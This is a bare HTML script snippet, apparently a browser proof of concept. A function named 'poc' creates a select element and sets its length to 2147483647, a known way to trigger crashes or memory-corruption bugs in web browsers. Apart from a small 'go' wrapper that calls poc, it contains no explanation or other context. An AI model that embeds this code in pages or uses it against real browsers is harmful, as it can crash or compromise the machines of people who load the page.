<script> function poc(o) { e = document.createElement("select"); e.length=2147483647; } function go() { poc(0); } </script>